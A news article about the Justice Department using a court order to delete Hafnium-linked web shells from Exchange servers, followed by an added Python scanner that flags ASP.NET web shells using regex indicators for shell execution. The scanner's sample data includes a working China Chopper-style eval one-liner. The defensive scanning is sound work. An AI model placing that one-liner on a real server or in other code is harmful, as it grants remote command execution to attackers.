DoJ used court order to thwart ‘hundreds’ of Exchange Server web shells

The Department of Justice used a court order to dismantle ‘hundreds’ of web shells installed using Exchange Server vulnerabilities. (Photo by Roy Rochlin/Getty Images for Leaders)

The Department of Justice used a court order to dismantle ‘hundreds’ of web shells installed through Exchange Server vulnerabilities that Microsoft patched six weeks ago. At the time of the patch, Microsoft said that a state-sponsored group operating out of China, which it dubbed Hafnium, was actively exploiting the vulnerabilities.

“Today’s court-authorized removal of the malicious web shells demonstrates the department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General for National Security John Demers in a statement.

“Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity.”

Microsoft, which patched two new vulnerabilities in Exchange Server on Tuesday afternoon, declined a request for comment.

The department removed the web shells through the web shells themselves, issuing a command through each shell that caused it to delete itself from the server. The FBI is attempting to notify by email every owner of a server from which a shell was removed, and is contacting internet service providers to identify the remaining victims from their IP addresses.

The DOJ states that it removed “one early hacking group’s remaining web shells,” while noting that several groups, both criminal and nation-state, have exploited the vulnerabilities. The department has not claimed to have removed any other group’s web shells, and removing a web shell does not patch the underlying vulnerabilities: an unpatched server remains exploitable, and a server that was already compromised still needs an incident response of its own.
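Because the court-ordered removal neither patches the server nor looks for anything beyond the one group’s shells, administrators still have to hunt for web shells themselves. The scanner below is an added example written for this article; it is not the DOJ’s, the FBI’s, or Microsoft’s code, and it is not one of the detection tools the statement refers to. It walks a directory tree of server-side web files, flags files that match generic ASP.NET web-shell indicators (an assumed list, not an authoritative signature set), notes files modified after a cutoff date (the cutoff and the directory layout are assumptions), and hashes each finding so it can be compared against other hosts. The sample files it scans are constructed inline for the demonstration; the directory and file names are illustrative only.

```python
"""Scan a web directory tree for likely ASP.NET web shells.

Added example for this article; not code from the article, the DOJ, the FBI,
or Microsoft. Indicator strings, directory names and the cutoff date are
assumptions to be tuned for a real environment.
"""
import datetime as dt
import hashlib
import os
import re
import tempfile

# Generic web-shell indicators (assumed list): each entry is (name, regex).
# None of these is proof on its own; several together on a file in a
# directory that should be static is what warrants investigation.
INDICATORS = [
    ("chopper-eval",  re.compile(r"eval\s*\(\s*Request", re.I)),          # one-line eval of a request parameter
    ("request-item",  re.compile(r"Request\.Item\[", re.I)),              # reads a parameter by name
    ("jscript-page",  re.compile(r'<%@\s*Page\s+Language\s*=\s*"?JScript', re.I)),  # JScript pages are rare in legit apps
    ("process-start", re.compile(r"System\.Diagnostics\.Process|ProcessStartInfo", re.I)),  # spawns a process
    ("cmd-exe",       re.compile(r"cmd(\.exe)?\s*/c", re.I)),             # shell command execution
    ("base64-decode", re.compile(r"FromBase64String", re.I)),             # common payload decoding step
]

# Server-side extensions worth looking at; static assets are skipped.
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}


def match_indicators(text):
    """Return the names of all indicators that fire on the file contents."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def sha256_file(path):
    """Hash a file so findings can be correlated across servers."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root, since):
    """Walk `root` and report web files that match indicators or were modified on/after `since` (UTC).

    A file with indicator hits is rated "high"; a recently modified file with
    no hits is rated "review", because these directories rarely change legitimately.
    """
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as f:
                    text = f.read()
                mtime = dt.datetime.fromtimestamp(os.path.getmtime(path), tz=dt.timezone.utc)
            except OSError:
                continue
            hits = match_indicators(text)
            recent = mtime >= since
            if hits or recent:
                findings.append({
                    "path": path,
                    "modified": mtime.isoformat(),
                    "indicators": hits,
                    "severity": "high" if hits else "review",
                    "sha256": sha256_file(path),
                })
    return findings


# Constructed sample tree (assumed layout loosely modelled on Exchange's
# web-facing directories; names are illustrative, not real findings).
SAMPLE_FILES = {
    # Benign sign-in page: ordinary markup, no execution primitives.
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %>\n<html><body><form runat="server">Sign in</form></body></html>\n',
    # Chopper-style one-liner; the "pw" parameter name is arbitrary.
    "owa/auth/Current/themes/resources/aspnet_client.aspx":
        '<%@ Page Language="JScript"%><%eval(Request.Item["pw"],"unsafe");%>\n',
    # Shell that spawns a process from attacker-supplied input.
    "ecp/auth/TimeoutLogout.aspx":
        '<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process(); %>\n',
    # Static asset: not a server-side file, so it is ignored.
    "owa/auth/logon.css": "body { color: #000; }\n",
}


def demo():
    """Write the constructed sample tree to a temp dir, scan it, and return findings with relative paths."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as f:
                f.write(content)
        # Assumed cutoff: a date shortly before exploitation was reported publicly.
        since = dt.datetime(2021, 2, 26, tzinfo=dt.timezone.utc)
        findings = scan(root, since)
        for finding in findings:
            finding["path"] = os.path.relpath(finding["path"], root).replace(os.sep, "/")
        return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for finding in demo():
        print(finding["severity"], finding["path"], finding["indicators"], finding["sha256"][:16])
```

On a real host you would point `scan` at the web-facing directories of the server and set `since` to the date before which you trust the files; anything rated "high" should be preserved (copy and hash it) before it is deleted, because the shell is evidence of an intrusion that may have gone much further than the file itself.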

The move is unprecedented, and reflects a growing understanding that cyber risks should be addressed with the same urgency as other threats to national security and critical infrastructure, said Malcolm Harkins, chief security and trust officer for Cymatic.

“I applaud the approach. If you were to take it further, perhaps the cost of the cleanup should be billed to the folks who didn’t remove the web shell,” he said, drawing an analogy to a chemical plant owner who didn’t act quickly enough in response to a chemical spill, and to actions taken by federal authorities after the BP oil spill.

“There’s no doubt that more work remains to be done, but let there also be no doubt that the department is committed to playing its integral and necessary role in such efforts,” Demers said in the statement.

This story is evolving. Check back for updates.